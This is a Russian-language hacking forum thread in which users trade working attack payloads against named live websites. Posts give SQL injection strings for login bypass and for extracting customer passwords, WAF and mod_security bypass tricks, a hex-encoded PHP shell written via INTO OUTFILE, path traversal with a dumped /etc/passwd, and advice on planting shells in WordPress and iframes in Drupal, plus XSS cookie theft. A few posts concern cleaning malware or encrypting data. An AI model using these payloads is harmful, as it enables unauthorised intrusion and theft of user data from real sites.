Создает переодически(?) различные файлы типа class.php / main.php / и другие интересные названия. Раньше еще редиректы прописывало в .htaccess, но это я поправил изменением прав (такая вот заплатка). А еще оно делает файл с вот таким содержимым:

PHP:


Искал и айболитом и с помощью:
find ./ -name '*.php' | xargs grep -E '[0-9a-zA-Z/]{80}' > viruses.txt
что-то находил, что-то удалял, но пока не помогло.
чего еще сотворить? эта зараза лезет не в конкретную cms, хотя я раньше думал, что так. На данный момент создает эти файлы тупо в корне сайта. До этого они проявлялись в самых далеких местах, после вчерашней чистки пока только в корне.


посмотрите даты изменения файлов, бэкдоры вида , конфигурацию всего сервера (устаревшая? вомзожно стоит накатить секурные апдейты?), если cms, тоже обновить. также изучайте логи и смотрите, куда имеено залились. ну и конечно, советую обратиться к спецалисту, например вот (https://antichat.live/showthread.php/p/3437584/)

ghost1k said:
что-то находил, что-то удалял, но пока не помогло.
чего еще сотворить? эта зараза лезет не в конкретную cms, хотя я раньше думал, что так. На данный момент создает эти файлы тупо в корне сайта. До этого они проявлялись в самых далеких местах, после вчерашней чистки пока только в корне.


Сколько у вас сайтов на одном аккаунте? если несколько то их все разом чистить надо, но читска, как токовой не устронит проблему, нужно искать ее корень и проводить профилактические меры по предотвращению подобных ситуаций!

ответил в ЛС

чем же можно зашифровать данные поступающие в базу ?

кроме пароля открытые остаются email - они же логины, телефоны, номера карт например

и нужно что бы эти данные из базы могла расшифровать только функция в скрипте принимающая и обрабатывающая данные. данные хранятся в шифрованом виде

GAiN said:
чем же можно зашифровать данные поступающие в базу ?
кроме пароля открытые остаются email - они же логины, телефоны, номера карт например
и нужно что бы эти данные из базы могла расшифровать только функция в скрипте принимающая и обрабатывающая данные. данные хранятся в шифрованом виде


например mcrypt (http://www.phpsql.ru/mcrypt-encrypt) .

возможно ли зашифровать передачу скрытого ssid для wifi точки, что бы его нельзя было перехватить ? шифрование точки: WPA-PSK/WPA2-PSK

зашифровать так же как и пароль wifi точки !

Создаю пост запрос:

login=Admin'+--+\&pass=123

Слэш вызывает ошибку:

WHERE `login` = 'Admin' -- \' AND `password` = '202cb962ac59075b964b07152d234b70' LIMIT 1

Слэш убираю, а авторизация не проходит. Ощущение, что ' -- ' не комментирует. Пробовал /* в ответной ошибке остается только *. Подскажите что еще можно попробовать?

P.S.


Br@!ns said:
# например еще


Пробовал.(

Han said:
Создаю пост запрос:
login=Admin'+--+\&pass=123
Слэш вызывает ошибку:
WHERE `login` = 'Admin' -- \' AND `password` = '202cb962ac59075b964b07152d234b70' LIMIT 1
Слэш убираю, а авторизация не проходит. Ощущение, что ' -- ' не комментирует. Пробовал /* в ответной ошибке остается только *. Подскажите что еще можно попробовать?


# например еще

Han said:
Создаю пост запрос:
login=Admin'+--+\&pass=123
Слэш вызывает ошибку:
WHERE `login` = 'Admin' -- \' AND `password` = '202cb962ac59075b964b07152d234b70' LIMIT 1
Слэш убираю, а авторизация не проходит. Ощущение, что ' -- ' не комментирует. Пробовал /* в ответной ошибке остается только *. Подскажите что еще можно попробовать?
P.S. Пробовал.(


пробовали с комбинацией OR? http://www.securityidiots.com/Web-Pentest/SQL-Injection/bypass-login-using-sql-injection.html

faza02 said:
пробовали с комбинацией OR?
http://www.securityidiots.com/Web-Pentest/SQL-Injection/bypass-login-using-sql-injection.html


Пробовал. Запрос выполняется, но вход не происходит.

Han said:
Создаю пост запрос:
login=Admin'+--+\&pass=123
Слэш вызывает ошибку:
WHERE `login` = 'Admin' -- \' AND `password` = '202cb962ac59075b964b07152d234b70' LIMIT 1
Слэш убираю, а авторизация не проходит. Ощущение, что ' -- ' не комментирует. Пробовал /* в ответной ошибке остается только *. Подскажите что еще можно попробовать?
P.S. Пробовал.(




Code:
login=Admin'+or+login+='bad_login_name&pass=any

bad_login_name - любой логин кроме необходимого, к которому не подходит пасс any

KIR@PRO said:

Code:
login=Admin'+or+login+='bad_login_name&pass=any

bad_login_name
- любой логин кроме необходимого, к которому не подходит пасс
any


Не помогло.

В исходном коде введенные мною кавычки выглядят как & # 039; только без пробела. Это играет роль?

Han said:
Не помогло.
В исходном коде введенные мною кавычки выглядят как '. Это играет роль?


кавычки не экранируются и не фильтруются. попробуйте


Code:
SELECT * FROM users WHERE `login` = 'Admin' AND `password` = '1' OR '1'='1' --

это равносильно запросу


Code:
SELECT * FROM users WHERE login='Admin' AND TRUE

поэтому будет выборка из таблицы, где значение колонки login == Admin.

Han said:
Не помогло.
В исходном коде введенные мною кавычки выглядят как & # 039; . Это играет роль?


да, это фильтрация.... там походу только слеш не фильтруется

Есть Error based Injection.

Нужные данные находятся в соседней бд, при запросе "select pass from users" все выводит норм, при запросе "select table_name from+information_schema.tables" - все норм

Но когда пытаешься вытащить данные(таблицы и колонки вытягивает норм) с соседней бд срабатывает защита: "select pass2 from нужнаяБД.users". Примечательно, но и когда выполняешь запрос типа "select pass from БДвкоторойсижу.users" так же срабатывает защита. Подумал бы что дело в "." между бд и ьаблицей, но с information_schema вытягивает ведь. Застопорился, что можно попробовать?

норм


HTML:
_http://www.formaggiokitchen.com/shop/product_info.php?products_id=792+or(ExtractValue(1 ,concat(0x3a,(select+mid(customers_password,1,31)+ from+customers+limit+0,1))))=1

ошибка


HTML:
http://www.formaggiokitchen.com/shop/product_info.php?products_id=792+or(ExtractValue(1 ,concat(0x3a,(select+mid(customers_password,1,31)+ from+formaggiodb_osc.customers+limit+0,1))))=1

действительно фильтр на имя бд. помогло урл кодирование:


Code:
http://www.formaggiokitchen.com/shop/product_info.php?products_id=792+or(ExtractValue(1 ,concat(0x3a,(select+mid(customers_password,1,31)+ from+forma%67%67iodb_osc.customers+limit+0,1))))=1

где %6767 = gg, то есть имя бд formaggiodb_osc

Как залить шелл при sql-иъекции. Права file_priv есть. Могу читать файлы.

делаю 1+union+select+0,1,0x3C3F7068702073797374656D28245 F4745545B63293B203F3E+INTO+OUTFILE+'/tmp/1.txt' --

Файл не заливается.

По ходу дела фильтрация на кавычки. Как обойти и залить шелл?

Sanic1977 said:
Как залить шелл при sql-иъекции. Права file_priv есть. Могу читать файлы.
делаю 1+union+select+0,1,0x3C3F7068702073797374656D28245 F4745545B63293B203F3E+INTO+OUTFILE+'/tmp/1.txt' --
Файл не заливается.
По ходу дела фильтрация на кавычки. Как обойти и залить шелл?


/showpost.php?p=663815&postcount=39

/threadnav34338-1-10.html

соответственно, mg=on и mq=off

Чем можно вытянуть данные через Blind SQL inj в post запросе, на https протоколе?

Br@!ns said:
Чем можно вытянуть данные через Blind SQL inj в post запросе, на https протоколе?


php+curl

UXOR said:
php+curl


хотелось бы готовое решение, есть такие скрипты?

вряд ли будет готовое решение: случай индивидуальный, плюс, такое пишется довольно быстро можешь отписать мне в жабу, разберемся, либо посмотри сам, там не особо сложный скрипт выйдет.

Br@!ns said:
хотелось бы готовое решение, есть такие скрипты?


эм, а с какого момента у нас SQLMAP из моды вышел? там вроде все есть -r путь до текстовика с POStом

Br@!ns said:
хотелось бы готовое решение, есть такие скрипты?


Вот как пример скрипта:

/showpost.php?p=3739236&postcount=6

тебе только остается написать цикл под свой случай!


-=Cerberus=- said:
эм, а с какого момента у нас SQLMAP из моды вышел? там вроде все есть -r путь до текстовика с POStом


Бывает попадаются такие уязвимости, что не один софт не возьмет из широко используемых в паблике, приходится писать самим скрипты для автоматизации.

faza02 said:
какие возможные алгоритмы для определния sqli? то, что пришло в голову:
берем уязвимый параметр, подставляем в параметр сначала id=5+and+1=1-- и сравниваем размер страницы (или diff) с первоначальной (id=5). если результат одинаковый, то id=5+and+1=2-- и также сравниваем с размером исходной страницы. ваши идеи? что делать в случае, если на странице рандомно генерируемые объекты?


С проверкой наличия SQL-injection всё очень сложно. Инъекции бывают очень разные. Многое зависит от цели - аудит типа black-box конкретного ресурса, проверка списка URL.

Во втором случае будет целесообразнее покрыть N% возможных случаев парой запросов, чем приближаться к 99% используя сотни запросов и большой анализатор.

В первом случае на хороший алгоритм нужны сотни человеко-часов. Или даже тысячи. Можете посмотреть на sqlmap - это самое популярное ПО в этой области. Однако даже оно, бывает, не может определить наличие инъекции, которую профессионал возьмет за 5 минут.

Даже если у вас будет разработка, намного превосходящая sqlmap по эффективности, вы не сможете раскрутить часть инъекций и правильно интерпретировать информацию, т.к. если бы вы могли это сделать - вы бы не задавали этот вопрос.

Для второго случая просто не изобретайте велосипед - все уже есть. Программ - множество, половина с открытыми исходными кодами. Для первого предлагаю почитать статьи по инъекциям. Разбирать инъекции, рассматривать возможные WAF. Может быть тогда вы сможете подойти к вопросу серьезно.

XAMEHA said:
С проверкой наличия SQL-injection всё очень сложно. Инъекции бывают очень разные. Многое зависит от цели - аудит типа black-box конкретного ресурса, проверка списка URL.
Во втором случае будет целесообразнее покрыть N% возможных случаев парой запросов, чем приближаться к 99% используя сотни запросов и большой анализатор.
В первом случае на хороший алгоритм нужны сотни человеко-часов. Или даже тысячи. Можете посмотреть на sqlmap - это самое популярное ПО в этой области. Однако даже оно, бывает, не может определить наличие инъекции, которую профессионал возьмет за 5 минут.
Даже если у вас будет разработка, намного превосходящая sqlmap по эффективности, вы не сможете раскрутить часть инъекций и правильно интерпретировать информацию, т.к. если бы вы могли это сделать - вы бы не задавали этот вопрос.
Для второго случая просто не изобретайте велосипед - все уже есть. Программ - множество, половина с открытыми исходными кодами. Для первого предлагаю почитать статьи по инъекциям. Разбирать инъекции, рассматривать возможные WAF. Может быть тогда вы сможете подойти к вопросу серьезно.


спасибо за ответ, сделал по-своему. погрешность получилась довольно большая, из списка в 1000 сайтов после ручной проверки нашлось порядка 370+ уязвимых сайтов. скрипт ошибочно определяет на 180+ больше. делал с помощью алгоритма diff, для моих задач этого было достаточно. цель стояла определить, но не раскрутить.

P. S. все цифры приблизительны, я тоже мог много упустить, учитывая мой небольшой опыт

спасибо за ответ, сделал по-своему. погрешность получилась довольно большая, из списка в 1000 сайтов после ручной проверки нашлось порядка 370+ уязвимых сайтов. скрипт ошибочно определяет на 180+ больше. делал с помощью алгоритма diff, для моих задач этого было достаточно. цель стояла определить, но не раскрутить.
P. S. все цифры приблизительны, я тоже мог много упустить, учитывая мой небольшой опыт


писал для себя тоже подобный чекер, вся сложность в том, что при ковычке к примеру, меняется какая-то область сайта, я делал так, +and(1=1)--+ и так несколько раз, естественно меняя 1=1, тк в странице могут быть часы, банеры и тн, которые постонно меняются! Но даже он не дал 100% результата!

Доброго времени суток. Нашёл на сайте пассивную XSS, зарегался. С онлайн снифера взял ссылку на картинку, составил запрос, сам перешёл по ссылке, но на снифере логов нету. Может ли быть, что браузер не даёт отправиться кукам? JavaScript включён.

Подскажите как в Oracle вывести имена всех баз данных? типа как в mysql schema_name from schemata

andrxx said:
Подскажите как в Oracle вывести имена всех баз данных? типа как в mysql schema_name from schemata




Code:
SELECT * FROM all_users;

faza02 said:

Code:
SELECT * FROM all_users;



структура all_users


USERNAME USER_ID CREATED


где там названия баз посмотреть?

andrxx said:
структура all_users
где там названия баз посмотреть?


username и есть имя базы.

HTML:
http://www.experiencerc.com/store/index.php?cPath=10_206_207_570&limit=1180'

Можно что нибудт придумать в limit?

Br@!ns said:

HTML:
http://www.experiencerc.com/store/index.php?cPath=10_206_207_570&limit=1180'

Можно что нибудт придумать в limit?


www.experiencerc.com/store/index.php?cPath=10_206_207_570&limit=1180 PROCEDURE ANALYSE (0, (SELECT 3 ORDER BY (SELECT 1 from information_schema.tables group by concat((SELECT version()),floor(rand(0)*2)) having min(0))))+--+

всем привет

что это за вид уязвимости такой ? как он называется ?

нашёл видео - которое показывает такой метод, на укозе правда, но если он действует в разных ситуациях: https://www.youtube.com/watch?v=0I5FnjP_m0U

я таким образом удалил основной email Логин в панели управления доменом https://ru.domaincontext.com - который по идеи не удаляется

GAiN said:
всем привет
что это за вид уязвимости такой ? как он называется ?
нашёл видео - которое показывает такой метод, на укозе правда, но если он действует в разных ситуациях:
https://www.youtube.com/watch?v=0I5FnjP_m0U
я таким образом удалил основной email Логин в панели управления доменом https://ru.domaincontext.com - который по идеи не удаляется


HTML-Injection

Реально ли сделать так, чтобы если кто-то в консоли linux запустил bash-скрипт или программу, то этот скрипт сохранил бы пароль текущего юзера куда-нибудь в файл? Или что можно сделать, чтобы получить пароль таким образом?

Code:
ht tp://w ww.vijp hoto.com/ind ex2.php?catid=47' AN D 1989=198 9 AN D 'IhRi'='IhRi

не получается слить инфу скулмапом, т.к. получаю постоянно 406 Not Acceptable. Что-то вроде waf. Как обойти? Помогите плиз, оч важно

часто бывает в джумле стоит какой-то модуль для защиты от sql инъекций. определил что реагирует на "jos". если оно встречается, то появляется:


403: Access Forbidden
Attempted SQL injection in REQUEST_URI


пробовал шаманить - ничего не получилось. мб подскажет кто как можно обойти ?)

:."]
.:[melkiy]:. said:
часто бывает в джумле стоит какой-то модуль для защиты от sql инъекций. определил что реагирует на "jos". если оно встречается, то появляется:
пробовал шаманить - ничего не получилось. мб подскажет кто как можно обойти ?)


HEX, URL-encode, Double URL-encode

Смотря в каком месте

select * from %6aos_users

select * from %256aos_users

select * from information_schema.table where table_name=0x6a6f735f7573657273

или имя префикса замени на %23__


vikler said:

Code:
ht tp://w ww.vijp hoto.com/ind ex2.php?catid=47' AN D 1989=198 9 AN D 'IhRi'='IhRi

не получается слить инфу скулмапом, т.к. получаю постоянно 406 Not Acceptable. Что-то вроде waf. Как обойти? Помогите плиз, оч важно


максимум до чего дошел:


Code:
http://www.vijphoto.com/index2.php?id=-73+union%c0%4aselect+/*!1*/,/*!2*/,/*!3*/,/*!4*/,/*!5*/,/*!6*/,/*!7*/,/*!8*/,/*!9*/,/*!10*/,/*!11*/,/*!12*/,/*!13*/,/*!14*/,/*!15*/,/*!16*/,/*!17*/,/*!18*/,/*!19*/,/*!20*/,/*!21*/,/*!22*/,/*!23*/--+

но вывода нет, хотя и запрос корректный вроде

blind:


Code:
http://www.vijphoto.com/index2.php?id=73+and+substring(version(),1,1)=5--+

faza02 said:
или имя префикса замени на %23__
максимум до чего дошел:

Code:
http://www.vijphoto.com/index2.php?id=-73+union%c0%4aselect+/*!1*/,/*!2*/,/*!3*/,/*!4*/,/*!5*/,/*!6*/,/*!7*/,/*!8*/,/*!9*/,/*!10*/,/*!11*/,/*!12*/,/*!13*/,/*!14*/,/*!15*/,/*!16*/,/*!17*/,/*!18*/,/*!19*/,/*!20*/,/*!21*/,/*!22*/,/*!23*/--+

но вывода нет, хотя и запрос корректный вроде
blind:

Code:
http://www.vijphoto.com/index2.php?id=73+and+substring(version(),1,1)=5--+



хм, то есть ничего не сделаешь, так?

vikler said:
хм, то есть ничего не сделаешь, так?


я пока пытаюсь обойти фильтрацию, а вам я предложил - раскручивайте, как слепую

vikler said:
хм, то есть ничего не сделаешь, так?




http://www.vijphoto.com/index2.php?id=-73+/*!union*/+/*!select*/+/*!1*/,/*!2*/,/*!3*/,/*!4*/,/*!5*/,/*!6*/,/*!7*/,/*!8*/,/*!9*/,/*!10*/,/*!11*/,/*!12*/,/*!13*/,/*!14*/,/*!15*/,/*!16*/,/*!17*/,/*!18*/,/*!19*/,/*!20*/,/*!21*/,/*!22*/,/*!23*/--+


а так не?

и смотри наверх... в тайтле вывод. 6 рентабельное поле

оо спасибо @HAXTA4OK. Скинула вопрос в личку, чтоб тут не спамить

Может кто ещё подскажет?

Как фильтрацию дальше для from обойти? Лочат опять


Code:
http://www.vijphoto.com/index2.php?id=-73+/*!union*/+/*!select*/+/*!1*/,/*!2*/,/*!3*/,/*!4*/,/*!5*/,/*!mysql.user.password*/,/*!7*/,/*!8*/,/*!9*/,/*!10*/,/*!11*/,/*!12*/,/*!13*/,/*!14*/,/*!15*/,/*!16*/,/*!17*/,/*!18*/,/*!19*/,/*!20*/,/*!21*/,/*!22*/,/*!23*/+/*!from*/+/*!mysql.user*/--+

vikler said:
Может кто ещё подскажет?
Как фильтрацию дальше для from обойти? Лочат опять

Code:
http://www.vijphoto.com/index2.php?id=-73+/*!union*/+/*!select*/+/*!1*/,/*!2*/,/*!3*/,/*!4*/,/*!5*/,/*!mysql.user.password*/,/*!7*/,/*!8*/,/*!9*/,/*!10*/,/*!11*/,/*!12*/,/*!13*/,/*!14*/,/*!15*/,/*!16*/,/*!17*/,/*!18*/,/*!19*/,/*!20*/,/*!21*/,/*!22*/,/*!23*/+/*!from*/+/*!mysql.user*/--+



www.vijphoto.com/index2.php?id=-73+/*!12345union*/+/*!select*/+/*!1*/,/*!2*/,/*!3*/,/*!4*/,/*!5*/,/*!table_name*/,/*!7*/,/*!8*/,/*!9*/,/*!10*/,/*!11*/,/*!12*/,/*!13*/,/*!14*/,/*!15*/,/*!16*/,/*!17*/,/*!18*/,/*!19*/,/*!20*/,/*!21*/,/*!22*/,/*!23*//*!from*//*!information_schema.tables*/where table_schema=database()+--+l

vikler said:
Может кто ещё подскажет?
Как фильтрацию дальше для from обойти? Лочат опять

Code:
http://www.vijphoto.com/index2.php?id=-73+/*!union*/+/*!select*/+/*!1*/,/*!2*/,/*!3*/,/*!4*/,/*!5*/,/*!mysql.user.password*/,/*!7*/,/*!8*/,/*!9*/,/*!10*/,/*!11*/,/*!12*/,/*!13*/,/*!14*/,/*!15*/,/*!16*/,/*!17*/,/*!18*/,/*!19*/,/*!20*/,/*!21*/,/*!22*/,/*!23*/+/*!from*/+/*!mysql.user*/--+



http://www.vijphoto.com/index2.php?id=-73 /*!union*/ (select*from (select 1) a1 join (select 2) a2 join (select 3) a3 join (select 4) a4 join (select 5) a5 join (select 6) a6 join (select 7) a7 join (select 8) a8 join (select 9) a9 join (select 10) a10 join (select 11) a11 join (select 12) a12 join (select 13) a13 join (select 14) a14 join (select 15) a15 join (select version()) a16 join (select 17) a17 join (select 18) a18 join (select 19) a19 join (select 20) a20 join (select 21) a21 join (select 22) a22 join (select 23) a23)

=)

Code:
index.php?cat=test'

возвращает это:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''test'' ORDER BY id DESC LIMIT 0, 9' at line 1

Когда пытаюсь крутить срабатывает mod_security

Обхожу так


Code:
http://execstyle.com/catPage.php?cat=test+/*!50000UNION*/+/*!50000SELECT*/+1,2,3,4,5,6,7,8,9,10+--+

После этого я виже весь свой запрос на экране

если поставить после test кавычку, возвращает следующее:

The used SELECT statements have a different number of columns

erwap said:

Code:
index.php?cat=test'

возвращает это:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''test'' ORDER BY id DESC LIMIT 0, 9' at line 1
Когда пытаюсь крутить срабатывает mod_security
Обхожу так

Code:
http://execstyle.com/catPage.php?cat=test+/*!50000UNION*/+/*!50000SELECT*/+1,2,3,4,5,6,7,8,9,10+--+

После этого я виже весь свой запрос на экране
если поставить после test кавычку, возвращает следующее:
The used SELECT statements have a different number of columns


через error based всё вытягивает отлично

erwap said:

Code:
index.php?cat=test'

возвращает это:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''test'' ORDER BY id DESC LIMIT 0, 9' at line 1
Когда пытаюсь крутить срабатывает mod_security
Обхожу так

Code:
http://execstyle.com/catPage.php?cat=test+/*!50000UNION*/+/*!50000SELECT*/+1,2,3,4,5,6,7,8,9,10+--+

После этого я виже весь свой запрос на экране
если поставить после test кавычку, возвращает следующее:
The used SELECT statements have a different number of columns


Очень интересный WAF. Заинтересовала возможность вывода именно "union+select" методом.

Во-первых - там всего 1 поле.


_http://execstyle.com/catPage.php?cat=test%27and(1)=1+order+by+2%23


Во-вторых, фильтруется связка union+select. Обходится стандартно.


http://execstyle.com/catPage.php?cat=test%27and(1)=1%0Aunion(select())% 23


В-третьих, фильтруются какие либо текстовые или числовые данные, следующие за select. Всё, кроме спецсимволов.


http://execstyle.com/catPage.php?cat=test%27and(1)=1%0Aunion(select(@@) )%23


Но селекция проходит при условия отсутствия union в запросе. Этим и объясняется возможность раскрутки Error-based вектором.

Думаю над путями обхода, люблю WAF)

BigBear, напиши потом, как получиться

http://www.humidordiscount.com/cigar_clubs.php?selected_country=SG'+order+by+1+--+

Подтолкните на мыслю какую нибудь

Непонятно что и как фильтрует

Br@!ns said:
http://www.humidordiscount.com/cigar_clubs.php?selected_country=SG'+order+by+1+--+
Подтолкните на мыслю какую нибудь
Непонятно что и как фильтрует


Там нету уязвимости.

kingbeef said:
Там нету уязвимости.


там есть уязвимость, но она в str и кавычки кодируются в %27, т. е. mq = on

http://www.humidordiscount.com/cigar_clubs.php?selected_country=SG\

PS. http://www.humidordiscount.com/tracking.php?language=1

PS2.


Code:
http://www.humidordiscount.com/tracking.php?language=loll../../../../../../../../../etc/passwd/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././



Code:
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/bin/false daemon:x:2:2:daemon:/sbin:/bin/false adm:x:3:4:adm:/var/adm:/bin/false lp:x:4:7:lp:/var/spool/lpd:/bin/false sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/bin/false news:x:9:13:news:/usr/lib/news:/bin/false uucp:x:10:14:uucp:/var/spool/uucppublic:/bin/false operator:x:11:0:operator:/root:/bin/bash man:x:13:15:man:/usr/man:/bin/false postmaster:x:14:12:postmaster:/var/spool/mail:/bin/false cron:x:16:16:cron:/var/spool/cron:/bin/false ftp:x:21:21::/home/ftp:/bin/false sshd:x:22:22:sshd:/dev/null:/bin/false at:x:25:25:at:/var/spool/cron/atjobs:/bin/false squid:x:31:31:Squid:/var/cache/squid:/bin/false gdm:x:32:32:GDM:/var/lib/gdm:/bin/false xfs:x:33:33:X Font Server:/etc/X11/fs:/bin/false games:x:35:35:games:/usr/games:/bin/false named:x:40:40:bind:/var/bind:/bin/false postgres:x:70:70::/var/lib/postgresql:/bin/bash nut:x:84:84:nut:/var/state/nut:/bin/false cyrus:x:85:12::/usr/cyrus:/bin/false vpopmail:x:89:89::/var/vpopmail:/bin/false postfix:x:207:207:postfix:/var/spool/postfix:/bin/false smmsp:x:209:209:smmsp:/var/spool/mqueue:/bin/false portage:x:250:250:portage:/var/tmp/portage:/bin/false guest:x:405:100:guest:/dev/null:/dev/null nobody:x:99:99:nobody:/: domainfactory:x:502:502::/home/domainfactory:/bin/bash domcgi:x:520:520::/home/domcgi:/bin/bash sshd:!!:59968:532:sshd privsep:/var/empty:/bin/false mailnull:!!:47:47::/var/spool/mqueue:/sbin/nologin mysql:x:100:101:MySQL server:/var/lib/mysql:/bin/bash ldap:x:439:439:added by portage for openldap:/usr/lib/openldap:/sbin/nologin

дерзай

Поднимаю актуальную тему - заливка шелла вордпресс , админка, права назапись в директории тем отсутствуют(You need to make this file writable before you can save your changes ), установка темы из файла просит пасс фтп .но я точно знаю что есть обход этого и возможность все-таки залить. (BigBear делал мне 1 раз такое)

было видео по обходу,но его удалили с хостинга. Подскажите советом

"установка темы из файла просит пасс фтп" так шелл залился wp-content/uploads по дефолту, а так поищи в настройках чтото там media. Да и вообще просмотри все файлы темы т.к. есть вероятность что какой нибудь файл редактируется

"права назапись в директории тем отсутствуют" найди путь путем ошибки тот же PHPSESSID, далее поменяй дефолтный путь wp-content/uploads на ../../home/var/www/test.com/test/ типа такого где имеется права на запись

собственно у меня вопрос, имеется drupal прав нет, каким образом можно проифреймить все страницы, может через админку, базу?

pinch said:
собственно у меня вопрос, имеется drupal прав нет, каким образом можно проифреймить все страницы, может через админку, базу?


а разве блоки в друпале не из бд берутся? Тогда можно было бы там и вписать свой код. или это только в 6.x ?

2)

есть ли варианты эксплотации sql в подобных случаях?


HTML:
http://www.phd-fitness.co.uk/store/search_products.php?search_string=%27&Search.x=0&Search.y=0

когда реакция только на ковычку, и все. ?

Br@!ns said:
а разве блоки в друпале не из бд берутся? Тогда можно было бы там и вписать свой код. или это только в 6.x ?
2)
есть ли варианты эксплотации sql в подобных случаях?

HTML:
http://www.phd-fitness.co.uk/store/search_products.php?search_string=%27&Search.x=0&Search.y=0

когда реакция только на ковычку, и все. ?


там примерно такой алгоритм:

1. спецсимволы экранируются (кавычка станет \')

2. из строки вырезаются кавычки (остается \) и из-за этого и возникает ошибка (получается что-то вроде WHERE search_str like '\'

и еще меня там заблокировали, зайти не могу

Есть скрипт

echo file_get_contents('fike_'.$_GET['file']);

есть идеи как прочитать index.php или еще что нибудь??)

с друпалом разобрался через бд и админку можно проифреймить как раз через блоки

[akep"]
DJ ][akep said:
Есть скрипт
echo file_get_contents('fike_'.$_GET['file']);
есть идеи как прочитать index.php или еще что нибудь??)


.php?file=/../../../../../etc/passwd

.php?file=/../index.php

PS. Br@!ns,


Code:
https://www.phd-fitness.co.uk/store/user_account.php?lang=1%27+and+substr%28@@version, 1,1%29=5--+

скобки там фильтруются, однако урл-кодирование решит эту проблему

hobbyg ames.ru/u/index.php?route=product/product&product_id=36103


есть уязвимость или нет, не могу понять?

было бы не плохо слить материалы для печати)

EksTasy said:
есть уязвимость или нет, не могу понять?
было бы не плохо слить материалы для печати)


По линку нет.

route - не динамический параметр:

/u/index.php?product_id=36103

product_id - int casting:

/u/index.php?product_id=36103x

/u/index.php?product_id=x36103

EksTasy said:
есть уязвимость или нет, не могу понять?
было бы не плохо слить материалы для печати)


с чего вы взяли? нет.

ppppppppppppp млин ...

подскажите

запрос пост

&more[]=-1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT((database()),0x3a,FLOOR(RAND(0)*2) )x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'

ответ

Duplicate entry 'ex_info:1' for key 'group_key'

ну блин а дальше тупик,как зти таблицы вытащить((

Code:
